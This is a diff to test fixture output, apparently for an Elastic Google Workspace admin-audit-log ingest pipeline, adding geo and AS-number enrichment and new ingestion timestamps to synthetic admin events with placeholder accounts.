@@ -1280,6 +1496,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1289,7 +1517,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004896200Z", + "ingested": "2021-12-14T14:44:54.651976692Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_KEYWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_KEYWORD", @@ -1351,6 +1579,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1360,7 +1600,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004900900Z", + "ingested": "2021-12-14T14:44:54.651977048Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LANGUAGE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LANGUAGE", @@ -1422,6 +1662,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1431,7 +1683,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004904600Z", + "ingested": "2021-12-14T14:44:54.651977412Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_LOCATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_LOCATION", 
@@ -1493,6 +1745,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1502,7 +1766,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004909Z", + "ingested": "2021-12-14T14:44:54.651977773Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ORGANIZATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ORGANIZATION", @@ -1564,6 +1828,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1573,7 +1849,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004942700Z", + "ingested": "2021-12-14T14:44:54.651978136Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_PHONE_NUMBER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_PHONE_NUMBER", @@ -1635,6 +1911,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1644,7 +1932,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004946700Z", + "ingested": "2021-12-14T14:44:54.651978595Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_EMAIL", @@ -1706,6 +1994,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1715,7 +2015,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004951500Z", + "ingested": "2021-12-14T14:44:54.651978951Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_RECOVERY_PHONE\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_RECOVERY_PHONE", @@ -1777,6 +2077,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -1786,7 +2098,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004955300Z", + "ingested": "2021-12-14T14:44:54.651979341Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_RELATION\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_RELATION", @@ -1848,6 +2160,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1857,7 +2181,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004960300Z", + "ingested": "2021-12-14T14:44:54.651979703Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_USER_ADDRESS\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_USER_ADDRESS", @@ -1919,6 +2243,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1928,7 +2264,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004966200Z", + "ingested": "2021-12-14T14:44:54.651980066Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"BEGIN_DATE_TIME\",\"value\":\"2002-10-02T15:00:00Z\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"EMAIL_MONITOR_LEVEL_CHAT\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_DRAFT_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_INCOMING_EMAIL\",\"value\":\"info\"},{\"name\":\"EMAIL_MONITOR_LEVEL_OUTGOING_EMAIL\",\"value\":\"info\"},{\"name\":\"END_DATE_TIME\",\"value\":\"2002-10-02T16:00:00Z\"}]}}", "provider": "admin", "action": "CREATE_EMAIL_MONITOR", @@ -1990,6 +2326,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", 
@@ -1999,7 +2347,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004972Z", + "ingested": "2021-12-14T14:44:54.651980425Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CREATE_DATA_TRANSFER_REQUEST\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"DESTINATION_USER_EMAIL\",\"value\":\"dest@example.com\"},{\"name\":\"APPLICATION_NAME\",\"value\":\"a,b,c\"}]}}", "provider": "admin", "action": "CREATE_DATA_TRANSFER_REQUEST", @@ -2061,6 +2409,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2070,7 +2430,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004977700Z", + "ingested": "2021-12-14T14:44:54.651980777Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GRANT_DELEGATED_ADMIN_PRIVILEGES\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "GRANT_DELEGATED_ADMIN_PRIVILEGES", 
@@ -2132,6 +2492,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2141,7 +2513,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.004997400Z", + "ingested": "2021-12-14T14:44:54.651981130Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_ACCOUNT_INFO_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "provider": "admin", "action": "DELETE_ACCOUNT_INFO_DUMP", @@ -2203,6 +2575,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2212,7 +2596,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005003Z", + "ingested": "2021-12-14T14:44:54.651981487Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_EMAIL_MONITOR\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"EMAIL_MONITOR_DEST_EMAIL\",\"value\":\"dest@example.com\"}]}}", "provider": "admin", "action": "DELETE_EMAIL_MONITOR", 
@@ -2274,6 +2658,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2283,7 +2679,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005008300Z", + "ingested": "2021-12-14T14:44:54.651981843Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DELETE_MAILBOX_DUMP\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"REQUEST_ID\",\"value\":\"id\"}]}}", "provider": "admin", "action": "DELETE_MAILBOX_DUMP", @@ -2345,6 +2741,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2354,7 +2762,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005013600Z", + "ingested": "2021-12-14T14:44:54.651982197Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_FIRST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_FIRST_NAME", 
@@ -2416,6 +2824,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2425,7 +2845,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005019200Z", + "ingested": "2021-12-14T14:44:54.651991818Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"GMAIL_RESET_USER\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"GMAIL_RESET_REASON\",\"value\":\"reason\"}]}}", "provider": "admin", "action": "GMAIL_RESET_USER", @@ -2487,6 +2907,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2496,7 +2928,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005024600Z", + "ingested": "2021-12-14T14:44:54.651992630Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_LAST_NAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_LAST_NAME", 
@@ -2558,6 +2990,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2567,7 +3011,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005029900Z", + "ingested": "2021-12-14T14:44:54.651993484Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_ADDED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "MAIL_ROUTING_DESTINATION_ADDED", @@ -2629,6 +3073,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2638,7 +3094,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005038500Z", + "ingested": "2021-12-14T14:44:54.651993893Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"MAIL_ROUTING_DESTINATION_REMOVED\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "MAIL_ROUTING_DESTINATION_REMOVED", 
@@ -2700,6 +3156,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2709,7 +3177,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005044100Z", + "ingested": "2021-12-14T14:44:54.651994261Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"ADD_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "provider": "admin", "action": "ADD_NICKNAME", @@ -2771,6 +3239,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2780,7 +3260,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005049600Z", + "ingested": "2021-12-14T14:44:54.651994623Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_NICKNAME\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"USER_NICKNAME\",\"value\":\"nick\"}]}}", "provider": "admin", "action": "REMOVE_NICKNAME", 
@@ -2842,6 +3322,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2851,7 +3343,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005054900Z", + "ingested": "2021-12-14T14:44:54.651994988Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD", @@ -2913,6 +3405,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2922,7 +3426,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005060200Z", + "ingested": "2021-12-14T14:44:54.651995356Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"CHANGE_PASSWORD_ON_NEXT_LOGIN\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_PASSWORD_ON_NEXT_LOGIN", 
@@ -2978,6 +3482,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -2987,7 +3503,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005065600Z", + "ingested": "2021-12-14T14:44:54.651995733Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"DOWNLOAD_PENDING_INVITES_LIST\"}}", "provider": "admin", "action": "DOWNLOAD_PENDING_INVITES_LIST", @@ -3043,6 +3559,18 @@ "id": "1" }, "source": { + "geo": { + "continent_name": "Asia", + "country_name": "Bhutan", + "location": { + "lon": 90.5, + "lat": 27.5 + }, + "country_iso_code": "BT" + }, + "as": { + "number": 35908 + }, "user": { "name": "foo", "id": "1", @@ -3052,7 +3580,7 @@ "ip": "67.43.156.13" }, "event": { - "ingested": "2021-12-09T13:38:57.005069500Z", + "ingested": "2021-12-14T14:44:54.651996095Z", "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"USER_SETTINGS\",\"name\":\"REMOVE_RECOVERY_EMAIL\",\"parameters\":[{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": 